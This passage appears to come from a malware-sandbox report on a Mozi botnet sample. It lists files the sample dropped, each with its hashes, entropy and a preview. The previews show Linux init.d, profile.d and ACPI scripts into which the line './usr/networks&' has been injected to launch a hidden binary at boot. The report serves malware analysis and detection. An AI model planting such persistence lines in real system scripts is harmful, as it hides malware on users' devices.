                                                                                                                  SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                                                  SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                                                  SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                                                  /etc/acpi/asus-wireless.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):157
                                                                                                                  Entropy (8bit):4.412729940630044
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                                                                  MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                                                  SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                                                  SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                                                  SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                                                  /etc/acpi/ibm-wireless.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):636
                                                                                                                  Entropy (8bit):4.722087767454589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                                                                  MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                                                  SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                                                  SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                                                  SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                                                  /etc/acpi/powerbtn.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2079
                                                                                                                  Entropy (8bit):4.778187000249208
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:pDpMMOMTeMn/zV5rh/1RzUKH2Z8uBiXGp2fVU6GjJN+V4ATo+aZ+:pCgeCrhXHzDfVpmhC/
                                                                                                                  MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                                                  SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                                                  SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                                                  SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                                                  /etc/acpi/tosh-wireless.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):483
                                                                                                                  Entropy (8bit):4.215331622973397
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                                                                  MD5:07889D65619CDB80F8E876A087F160D3
                                                                                                                  SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                                                                  SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                                                                  SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                                                  /etc/acpi/undock.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):266
                                                                                                                  Entropy (8bit):4.77497394042067
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                                                                  MD5:5E3A15E41D35EC409613236A20B5783E
                                                                                                                  SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                                                                  SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                                                                  SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                                                  /etc/bash_completion.d/libreoffice.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/init.d/S95baby.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):3.8936606896881854
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:TKH4v0VJ:hK
                                                                                                                  MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                  SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                  SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                  SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                  Malicious:true
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: bin.sh, Detection: malicious, Browse
                                                                                                                  • Filename: i, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                  • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                                  • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                                  • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                  • Filename: bad_file, Detection: malicious, Browse
                                                                                                                  • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                                  • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                                  Preview: #!/bin/sh./usr/networks&.
                                                                                                                  /etc/init.d/bootmisc.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):148
                                                                                                                  Entropy (8bit):4.718194263525147
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4KXGK+R0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4GX+R0Voo+v7n
                                                                                                                  MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                                                  SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                                                  SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
                                                                                                                  SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/checkfs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):147
                                                                                                                  Entropy (8bit):4.7173471450646
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4AGXi0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4u0Voo+v7n
                                                                                                                  MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                                                  SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                                                  SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
                                                                                                                  SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/checkroot-bootclean.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):250
                                                                                                                  Entropy (8bit):4.872318043360431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4YDi0Voo+v7n:AGKE3fdARMsBLbYerTn
                                                                                                                  MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                                                  SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                                                  SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                                                  SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/checkroot.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3111
                                                                                                                  Entropy (8bit):4.922960717312443
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:l+bjYLN1LiQKt6CYuSB/VN7pL4TyKWSmdrBW71cBi8m:0sxx2cJBVxZH01cc8m
                                                                                                                  MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                                                  SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                                                  SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                                                  SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                                                  /etc/init.d/hostname.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):404
                                                                                                                  Entropy (8bit):5.01878905639229
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:U20zRSdZ9iBbG2Us4Ji0SAGKFqLkMfF3teoWpAsBdA80F4n0u4hR9QR0Voo+v7n:Ul221wi0PGKE3fdpsBi8wlbHaNrTn
                                                                                                                  MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                                                  SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                                                  SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                                                  SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/hwclock.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountall-bootclean.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):249
                                                                                                                  Entropy (8bit):4.8912088003487595
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4iea2ii0Voo+v7n:AGKE3fdARMsBLbxPrTn
                                                                                                                  MD5:11FEEF13321D348864E7632D0746ECA2
                                                                                                                  SHA1:8D763DA6837280846D90AAACA3122D4F5CC0C62D
                                                                                                                  SHA-256:3DFE238D111564682893276C28BB49367C38A1F07A873B8F79E4FA8291FD7FE7
                                                                                                                  SHA-512:1C25B93B523688ACB3DF72B8EC148CD736CD479E7BEF3655DBCDB0B6D1AFACB652492ECF81A21EBADEBBFF14D0B20916DFD639E93EE1CCD6454C61F38BCAE46D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountall.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):148
                                                                                                                  Entropy (8bit):4.74526082342869
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4iLirKM0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4ierX0Voo+v7n
                                                                                                                  MD5:44D9E997053B704B17DB7DD64563014E
                                                                                                                  SHA1:1A29A3E927426D001FD0627C244B2397CF62D6C6
                                                                                                                  SHA-256:56B70518A2C51841B3C7BC5DDBAFC2AF62F4A47B25A1147A929E1129CBCBFAC7
                                                                                                                  SHA-512:B16AC50C36C5C17D405D2D8A1E9DB7D9863578EB71F4C382C56C4AA4BCEAEE6D4558A8CB94505464A1F13BA980741F5BE8CBD134C425004AA260DAC8F52B1581
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountdevsubfs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):56
                                                                                                                  Entropy (8bit):4.1427249051134325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                  MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                  SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                  SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                  SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountkernfs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):56
                                                                                                                  Entropy (8bit):4.1427249051134325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                                  MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                                  SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                                  SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                                  SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountnfs-bootclean.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):249
                                                                                                                  Entropy (8bit):4.8916208864241355
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4il/2ii0Voo+v7n:AGKE3fdARMsBLbPrTn
                                                                                                                  MD5:515975B77B7985776BC03B8F5C029EFE
                                                                                                                  SHA1:AA8F2AD5CB736EDC9BA0AEAE0748257E16875C11
                                                                                                                  SHA-256:DFD458AE245B70CB759F3FF40FB22BDFD520E627DABAF813C1D9BCA2C8155E00
                                                                                                                  SHA-512:169DC8DDF26C9F3A50C29D0F2AB99AF20D4F949F2F034AC25914086ED0DE37610D310F034E20B6493195E1BB54DC3036EB5BC999099D74ED53FFC813DED5FAD2
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountnfs-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/mountnfs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):190
                                                                                                                  Entropy (8bit):3.788938232230384
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVx5jWvFFFvNsTREKdKCvFF/pN1uFFFveYd3LrLl7jWvFFFvzv3Hv0VOORgn:a5qvFFhNsTR/3/hN4/Zdd75qvFFhzfv7
                                                                                                                  MD5:B09350F021B2B102B1E328A988261F3E
                                                                                                                  SHA1:93AD761BD0E1EBB3E9BDCAA469EC0192C0C9DA4F
                                                                                                                  SHA-256:E78EED19CCD5853AF3518FB3A16BE3244BE503798218041D65E5B44A0829A020
                                                                                                                  SHA-512:1DB35C4F8A6584FAC6AB3B0789B4037F09557457B248443489D5EDD2A6B34DB59735B3256F905D45075199DD870E52FFDBCC7E8DD85006BD1F85F8000F61FF8A
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&. exit 3. ;;. stop|status). # No-op. ;;. *). echo "Usage: $0 start|stop" >&2. exit 3. ;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/init.d/umountnfs.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):145
                                                                                                                  Entropy (8bit):4.730534942677594
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVaUsZ/ZHM4hWRJ7Fru4fR3dM0FJOUsZoG3Hv0VOORgn:eogJ7hu4pC0Voo+v7n
                                                                                                                  MD5:60F4E3C6C61EF7FA36BC5B00FF234698
                                                                                                                  SHA1:8AC881752B54BDB8FBD831A67AF6ED8CB2989B65
                                                                                                                  SHA-256:9DBFF8DF724717101900B6289BDB73EB05D67D4A14170EB3D26B20686F851F7F
                                                                                                                  SHA-512:741D35617E8C3B5D1278CB83C11BFBA1B6110B17D7E251DABA10EAC30BBAD8C5064F0EB7AF236EEEA9383E78C8E3F2DE477598763A5A1B7F213D606DF1F1D6D7
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..exit 3..;;. stop|"")..do_stop..;;. *)..echo "Usage: umountnfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                  /etc/profile.d/Z97-byobu.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/profile.d/apps-bin-path.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/profile.d/bash_completion.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/profile.d/cedilla-portuguese.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
